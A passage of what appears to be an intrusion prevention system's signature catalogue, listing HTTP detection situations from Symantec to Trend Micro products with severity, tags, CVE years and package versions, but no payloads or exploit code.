Last changed: sgpkg-ips-1588-5242
Vulnerability: Symantec-Scan-Engine-Authentication-Bypass
Description:
Back to top

HTTP_CRL-Symantec-Sygate-Management-Server-Authentication-Servlet-SQL-Injection

About this situation: Detects Symantec Sygate Management Server SQL injection exploits
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Sygate Management Server, CVE2006, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-64-1210
Last changed: sgpkg-ips-158-2032
Vulnerability: HTTP-Symantec-Sygate-Management-Server-Authentication-Servlet-SQL-Injection
Description:
Back to top

HTTP_CRL-Symantec-Web-Gateway-Dbutils.php-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Symantec Web Gateway detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Symantec Web Gateway, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-599-5211
Last changed: sgpkg-ips-1776-5242
Vulnerability: Symantec-Web-Gateway-Dbutils.php-SQL-Injection
Description:
Back to top

HTTP_CRL-Symantec-Web-Gateway-Multiple-Php-Pages-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Symantec Web Gateway detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Symantec Web Gateway, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-597-5211
Last changed: sgpkg-ips-1776-5242
Vulnerability: Symantec-Web-Gateway-Multiple-Php-Pages-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Symantec-Web-Gateway-OS-Command-Injection

About this situation: An attempt to exploit a vulnerability in Symantec Web Gateway detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, Symantec Web Gateway, CVE2016, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-812-5242
Last changed: sgpkg-ips-1013-5242
Vulnerability: Symantec-Web-Gateway-OS-Command-Injection-CVE-2016-5313
Description:
Back to top

HTTP_CRL-Symantec-Web-Gateway-Pbcontrol.php-Command-Injection

About this situation: An attempt to exploit a vulnerability in Symantec Web Gateway detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Symantec Web Gateway, CVE2012, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-474-5211
Last changed: sgpkg-ips-474-5211
Vulnerability: Symantec-Web-Gateway-Pbcontrol.php-Command-Injection
Description:
Back to top

HTTP_CRL-Symantec-Web-Gateway-Timer.php-Multiple-XSS-Vulnerabilities

About this situation: An attempt to exploit a vulnerability in Symantec Web Gateway detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Symantec Web Gateway, CVE2012, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-455-5211
Last changed: sgpkg-ips-1440-5242
Vulnerability: Symantec-Web-Gateway-Timer.php-Multiple-XSS-Vulnerabilities
Description:
Back to top

HTTP_CRL-Symmetricom-SyncServer-Unauthenticated-Remote-Command-Execution

About this situation: An attempt to exploit a vulnerability in a Microchip SyncServer module detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Linux, Any Hardware, Microchip SyncServer, CVE2022, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1720-5242
Last changed: sgpkg-ips-1720-5242
Vulnerability: Symmetricom-SyncServer-Unauthenticated-Remote-Command-Execution
Description:
Back to top

HTTP_CRL-Syncovery-For-Linux-Web-GUI-Authenticated-RCE

About this situation: An attempt to exploit a vulnerability in Syncovery File Sync & Backup Software for Linux detected.
Context: HTTP Request URI
Severity: 7
Tags: Linux, Any Hardware, Syncovery, CVE2022, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, HTTP URI Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1544-5242
Last changed: sgpkg-ips-1544-5242
Vulnerability: Syncovery-For-Linux-Web-GUI-Authenticated-RCE
Description:
Back to top

HTTP_CRL-Synology-DiskStation-Manager-smart.cgi-RCE

About this situation: An attempt to exploit a vulnerability in Synology detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Synology, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1341-5242
Last changed: sgpkg-ips-1341-5242
Vulnerability: Synology-DiskStation-Manager-smart.cgi-RCE
Description:
Back to top

HTTP_CRL-Synology-Safeaccess-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Synology SafeAccess detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Synology, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1650-5242
Last changed: sgpkg-ips-1650-5242
Vulnerability: Synology-Safeaccess-SQL-Injection
Description:
Back to top

HTTP_CRL-Sysax-Multi-Server-Stack-Based-Buffer-Overflow

About this situation: An attempt to exploit a Sysax Multi Server Stack Based Buffer Overflow vulnerability detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Sysax, CVE2012, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-705-5211
Last changed: sgpkg-ips-1396-5242
Vulnerability: Sysax-Multi-Server-Stack-Based-Buffer-Overflow
Description:
Back to top

HTTP_CRL-TA551-Shathak-Malware-Infection-Traffic

About this situation: TA551 Shathak malware infection traffic detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1294-5242
Last changed: sgpkg-ips-1294-5242
Vulnerability: TA551-Shathak-Malware-Infection-Traffic
Description:
Back to top

HTTP_CRL-Teltonika-RUT9XX-Router-OS-Command-Injection-CVE-2018-17532

About this situation: An attempt to exploit a vulnerability in Teltonika RUT9XX routers detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Teltonika RUT9XX, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1818-5242
Last changed: sgpkg-ips-1822-5242
Vulnerability: Teltonika-RUT9XX-Router-OS-Command-Injection-CVE-2018-17532
Description:
Back to top

HTTP_CRL-Tenda-AC11-Remote-Code-Execution-CVE-2021-31755

About this situation: An attempt to exploit a vulnerability in Tenda AC11 detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Tenda, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1406-5242
Last changed: sgpkg-ips-1406-5242
Vulnerability: Tenda-AC11-Remote-Code-Execution-CVE-2021-31755
Description:
Back to top

HTTP_CRL-Tenda-AC15-AC1900-Remote-Code-Execution-CVE-2020-10987

About this situation: An attempt to exploit a vulnerability in Tenda AC15 AC1900 routers detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Tenda, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1403-5242
Last changed: sgpkg-ips-1403-5242
Vulnerability: Tenda-AC15-AC1900-Remote-Code-Execution-CVE-2020-10987
Description:
Back to top

HTTP_CRL-Tenda-AC18-Remote-Code-Execution-CVE-2022-31446

About this situation: An attempt to exploit a vulnerability in Tenda AC18 detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Tenda, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1510-5242
Last changed: sgpkg-ips-1510-5242
Vulnerability: Tenda-AC18-Remote-Code-Execution-CVE-2022-31446
Description:
Back to top

HTTP_CRL-Tenda-ONT-GPON-AC1200-HG9-Command-Injection-CVE-2022-30023

About this situation: An attempt to exploit a vulnerability in Tenda ONT GPON AC1200 HG9 detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Tenda, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1606-5242
Last changed: sgpkg-ips-1606-5242
Vulnerability: Tenda-ONT-GPON-AC1200-HG9-Command-Injection-CVE-2022-30023
Description:
Back to top

HTTP_CRL-TerraMaster-TOS-ajaxdata.php-Multiple-Command-Injections

About this situation: An attempt to exploit a vulnerability in TerraMaster TOS detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, TerraMaster TOS, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1323-5242
Last changed: sgpkg-ips-1373-5242
Vulnerability: TerraMaster-TOS-ajaxdata.php-Multiple-Command-Injections
Description:
Back to top

HTTP_CRL-TerraMaster-TOS-Unauthenticated-RCE-CVE-2022-24989

About this situation: An attempt to exploit a vulnerability in TerraMaster TOS detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Unix, Linux, Any Hardware, TerraMaster TOS, CVE2022, Unix not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1624-5242
Last changed: sgpkg-ips-1624-5242
Vulnerability: TerraMaster-TOS-Unauthenticated-RCE-CVE-2022-24989
Description:
Back to top

HTTP_CRL-TerraMaster-Unauthenticated-RCE-Chain-CVE-2021-45837

About this situation: An attempt to exploit a vulnerability TerraMaster TOS detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Unix, Linux, Any Hardware, TerraMaster TOS, CVE2021, Unix not specific, Linux not specific, Suspected Disclosure, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1626-5242
Last changed: sgpkg-ips-1626-5242
Vulnerability: TerraMaster-Unauthenticated-RCE-Chain-CVE-2021-45837
Description:
Back to top

HTTP_CRL-TerraMaster-Unauthenticated-RCE-Chain-CVE-2021-45841

About this situation: An attempt to exploit a vulnerability TerraMaster TOS detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Unix, Linux, Any Hardware, TerraMaster TOS, CVE2021, Unix not specific, Linux not specific, Suspected Disclosure, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1626-5242
Last changed: sgpkg-ips-1626-5242
Vulnerability: TerraMaster-Unauthenticated-RCE-Chain-CVE-2021-45841
Description:
Back to top

HTTP_CRL-Test-Cgi-Directory-Disclosure

About this situation: Test cgi requested, possible information disclosure
Context: HTTP Normalized Request-Line
Severity: 2
Tags: Any Operating System, Any Hardware, Apache, NCSA HTTPd, CVE1999, Any Operating System not specific, Apache not specific, Potential Disclosure, TCP Client Traffic
First detected in: sgpkg-ips-15-1210
Last changed: sgpkg-ips-350-4219
Vulnerability: HTTP-Test-Cgi-Directory-Disclosure
Description:
Back to top

HTTP_CRL-TheftSpy.C-Traffic

About this situation: A suspicious traffic pattern detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Android, Any Hardware, Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-691-5211
Last changed: sgpkg-ips-691-5211
Vulnerability: Android.Spyware.TheftSpy-Botnet
Description:
Back to top

HTTP_CRL-ThinkPHP-RCE-Vulnerability-CVE-2018-20062

About this situation: An attempt to exploit a vulnerability in ThinkPHP detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, ThinkPHP, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1138-5242
Last changed: sgpkg-ips-1637-5242
Vulnerability: ThinkPHP-RCE-Vulnerability-CVE-2018-20062
Description:
Back to top

HTTP_CRL-Tiki-Wiki-PHP-Code-Execution

About this situation: An attempt to exploit a Tiki Wiki PHP Code Execution vulnerability detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, TikiWiki, CVE2012, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-709-5211
Last changed: sgpkg-ips-709-5211
Vulnerability: Tiki-Wiki-PHP-Code-Execution
Description:
Back to top

HTTP_CRL-TikiWiki-Admin-Authentication-Bypass-CVE-2020-15906

About this situation: An attempt to exploit a vulnerability in TikiWiki detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, TikiWiki, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1852-5242
Last changed: sgpkg-ips-1852-5242
Vulnerability: TikiWiki-Admin-Authentication-Bypass-CVE-2020-15906
Description:
Back to top

HTTP_CRL-TikiWiki-Tiki-Graph-Formula-Command-Execution

About this situation: An attempt to exploit a vulnerability in TikiWiki was detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, TikiWiki, CVE2007, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-309-4219
Last changed: sgpkg-ips-1590-5242
Vulnerability: TikiWiki-Tiki-Graph-Formula-Command-Execution
Description:
Back to top

HTTP_CRL-Tobfy-Traffic

About this situation: A suspicious traffic pattern detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-691-5211
Last changed: sgpkg-ips-1776-5242
Vulnerability: Win32.Trojan.Tobfy-Botnet
Description:
Back to top

HTTP_CRL-Too-Many-Parameters-In-GET-Request

About this situation: HTTP GET request contained a very large number of parameters
Context: HTTP Normalized Request-Line
Severity: 2
Tags: Any Operating System, Any Hardware, MS2010-09, MS2011-12, CVE2010, CVE2011, Any Operating System not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-344-4219
Last changed: sgpkg-ips-1768-5242
Vulnerability: Microsoft-IIS-Repeated-Parameter-Request-Denial-Of-Service
Microsoft-ASP.NET-Hash-Collision-Denial-Of-Service
Oracle-Multiple-Products-Hash-Collision-Denial-of-Service
Description:
Back to top

HTTP_CRL-Torpplar.A-Traffic

About this situation: A suspicious traffic pattern detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-694-5211
Last changed: sgpkg-ips-694-5211
Vulnerability: Win32.BankingTrojan.Torpplar.A-Botnet
Description:
Back to top

HTTP_CRL-Total-JS-CMS-12-Widget-JavaScript-Code-Injection

About this situation: An attempt to exploit a vulnerability in Total.js CMS detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Linux, Mac OS X, Any Hardware, Total.js, CVE2019, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1199-5242
Last changed: sgpkg-ips-1199-5242
Vulnerability: Total-JS-CMS-12-Widget-JavaScript-Code-Injection
Description:
Back to top

HTTP_CRL-Totolink-N600R-exportOvpn-Command-Injection-CVE-2022-26186

About this situation: An attempt to exploit a vulnerability in Totolink N600R detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Totolink, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1536-5242
Last changed: sgpkg-ips-1537-5242
Vulnerability: Totolink-N600R-exportOvpn-Command-Injection-CVE-2022-26186
Description:
Back to top

HTTP_CRL-Totolink-Wireless-Routers-Unauthenticated-RCE-Vulnerability

About this situation: An attempt to exploit a vulnerability in a Totolink Wireless Router detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Totolink, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1652-5242
Last changed: sgpkg-ips-1652-5242
Vulnerability: Totolink-Wireless-Routers-Unauthenticated-RCE-Vulnerability
Description:
Back to top

HTTP_CRL-TP-Link-Archer-AX21-Command-Injection-CVE-2023-1389

About this situation: An attempt to exploit a vulnerability in TP-Link Archer AX21 detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, TP-Link, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1582-5242
Last changed: sgpkg-ips-1641-5242
Vulnerability: TP-Link-Archer-AX21-Command-Injection-CVE-2023-1389
Description:
Back to top

HTTP_CRL-TP-Link-Cloud-Cameras-NCXXX-Bonjour-Command-Injection

About this situation: A vulnerability in TP LINK Cloud Cameras
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, TP-Link, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1297-5242
Last changed: sgpkg-ips-1301-5242
Vulnerability: TP-Link-Cloud-Cameras-NCXXX-Bonjour-Command-Injection
Description:
Back to top

HTTP_CRL-TP-Link-Tapo-C200-IP-Camera-Command-Injection-CVE-2021-4045

About this situation: An attempt to exploit a vulnerability in TP-Link Tapo C200 IP camera detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, TP-Link, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1501-5242
Last changed: sgpkg-ips-1501-5242
Vulnerability: TP-Link-Tapo-C200-IP-Camera-Command-Injection-CVE-2021-4045
Description:
Back to top

HTTP_CRL-TP-Link-TLWR840N-Command-Injection-CVE-2022-25060

About this situation: An attempt to exploit a vulnerability in TP-Link TL-WR840N detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, TP-Link, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1500-5242
Last changed: sgpkg-ips-1501-5242
Vulnerability: TP-Link-TLWR840N-Command-Injection-CVE-2022-25060
Description:
Back to top

HTTP_CRL-TP-Link-WR940N-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in TP-Link WR940N routers detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, TP-Link, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1385-5242
Last changed: sgpkg-ips-1385-5242
Vulnerability: TP-Link-WR940N-Stack-Buffer-Overflow
Description:
Back to top

HTTP_CRL-TrackerCam-Server-Php-Script-Argument-BOF

About this situation: An attempt to exploit a buffer overflow in TrackerCam server detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Windows, Any Hardware, TrackerCam, CVE2005, Windows not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-404-4219
Last changed: sgpkg-ips-1013-5242
Vulnerability: TrackerCam-Server-Php-Script-Argument-BOF
Description:
Back to top

HTTP_CRL-Trend-Micro-Apex-One-And-OfficeScan-CVE-2020-8470-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Trend Micro Apex One detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Trend Micro OfficeScan, Trend Micro Apex One, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1243-5242
Last changed: sgpkg-ips-1243-5242
Vulnerability: Trend-Micro-Apex-One-And-OfficeScan-CVE-2020-8470-Directory-Traversal
Description:
Back to top

HTTP_CRL-Trend-Micro-Control-Manager-Ad-Hoc-Query-Module-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Trend Micro Control Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Trend Micro Control Manager, CVE2012, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-483-5211
Last changed: sgpkg-ips-566-5211
Vulnerability: Trend-Micro-Control-Manager-Ad-Hoc-Query-Module-SQL-Injection
Description:
Back to top

HTTP_CRL-Trend-Micro-Control-Manager-Adhocquery_Processor-Getproductcategory-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Trend Micro Control Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Trend Micro Control Manager, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1082-5242
Last changed: sgpkg-ips-1082-5242
Vulnerability: Trend-Micro-Control-Manager-Adhocquery-Getproductcategory-SQL-Injection
Description:
Back to top

HTTP_CRL-Trend-Micro-Control-Manager-Adhocquery_Processor.aspx-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Trend Micro Control Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Trend Micro Control Manager, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-798-5211
Last changed: sgpkg-ips-798-5211
Vulnerability: Trend-Micro-Control-Manager-Adhocquery_Processor.aspx-SQL-Injection
Description:
Back to top

HTTP_CRL-Trend-Micro-Control-Manager-DLP_policy.php-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Trend Micro Control Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Trend Micro Control Manager, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-859-5242
Last changed: sgpkg-ips-1758-5242
Vulnerability: Trend-Micro-Control-Manager-DLP_policy.php-Directory-Traversal
Description:
Back to top

HTTP_CRL-Trend-Micro-Control-Manager-Lang-Parameter-Arbitrary-File-Inclusion

About this situation: An attempt to exploit a vulnerability in Trend Micro Control Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Trend Micro Control Manager, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-864-5242
Last changed: sgpkg-ips-1758-5242
Vulnerability: Trend-Micro-Control-Manager-Lang-Parameter-Arbitrary-File-Inclusion
Description:
Back to top

HTTP_CRL-Trend-Micro-Control-Manager-Scloudservice-Getpassword-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Trend Micro Control Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Trend Micro Control Manager, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1077-5242
Last changed: sgpkg-ips-1077-5242
Vulnerability: Trend-Micro-Control-Manager-Scloudservice-Getpassword-SQL-Injection
Description:
Back to top

HTTP_CRL-Trend-Micro-Control-Manager-Task_Controller-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Trend Micro Control Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Trend Micro Control Manager, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-791-5211
Last changed: sgpkg-ips-791-5211
Vulnerability: Trend-Micro-Control-Manager-Task_Controller-Information-Disclosure
Description:
Back to top

HTTP_CRL-Trend-Micro-Control-Manager-Widget-Importfile.php-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Trend Micro Control Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Trend Micro Control Manager, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-859-5242
Last changed: sgpkg-ips-1758-5242
Vulnerability: Trend-Micro-Control-Manager-Widget-Importfile.php-Directory-Traversal
Description:
Back to top

HTTP_CRL-Trend-Micro-InterScan-Messaging-Policywsaction-External-Entity-Injection

About this situation: An attempt to exploit a vulnerability in Trend Micro InterScan Messaging Virtual Appliance detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Trend Micro InterScan Messaging Security (Virtual Appliance), CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1313-5242
Last changed: sgpkg-ips-1313-5242
Vulnerability: Trend-Micro-InterScan-Messaging-Policywsaction-External-Entity-Injection
Description:
Back to top

HTTP_CRL-Trend-Micro-InterScan-Messaging-Security-Modtmcss-Command-Injection

About this situation: An attempt to exploit a vulnerability in Trend Micro InterScan Messaging Security (Virtual Appliance) detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Trend Micro InterScan Messaging Security (Virtual Appliance), CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1010-5242
Last changed: sgpkg-ips-1010-5242
Vulnerability: Trend-Micro-InterScan-Messaging-Security-Modtmcss-Command-Injection
Description:
Back to top

HTTP_CRL-Trend-Micro-InterScan-Messaging-Security-Remote-Code-Execution

About this situation: A Trend Micro InterScan Messaging Security Remote Code Execution vulnerability
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Linux, Any Hardware, Trend Micro InterScan Messaging Security (Virtual Appliance), CVE2017, Windows not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1016-5242
Last changed: sgpkg-ips-1019-5242
Vulnerability: Trend-Micro-InterScan-Messaging-Security-Remote-Code-Execution
Description:
Back to top

HTTP_CRL-Trend-Micro-InterScan-Web-Security-Virtual-Appliance-Decryptpasswd-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Trend Micro InterScan Web Security Virtual Appliance detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Trend Micro InterScan Web Security Virtual Appliance, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1313-5242
Last changed: sgpkg-ips-1313-5242
Vulnerability: Trend-Micro-InterScan-Web-Security-Decryptpasswd-Buffer-Overflow
Description:
Back to top

HTTP_CRL-Trend-Micro-InterScan-Web-Security-Virtual-Appliance-Password-Command-Injection

About this situation: An attempt to exploit a vulnerability in Trend Micro InterScan Web Security Virtual Appliance detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Trend Micro InterScan Web Security Virtual Appliance, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1320-5242
Last changed: sgpkg-ips-1320-5242
Vulnerability: Trend-Micro-InterScan-Web-Security-Virtual-Appliance-Password-Command-Injection
Description:
Back to top

HTTP_CRL-Trend-Micro-Iwsva-Deploymentwizardaction-Getclusterinfo-Command-Injection

About this situation: An attempt to exploit a vulnerability in Trend Micro InterScan Web Security Virtual Appliance detected
Context: HTTP Normalized Request-Line
Severity: 7
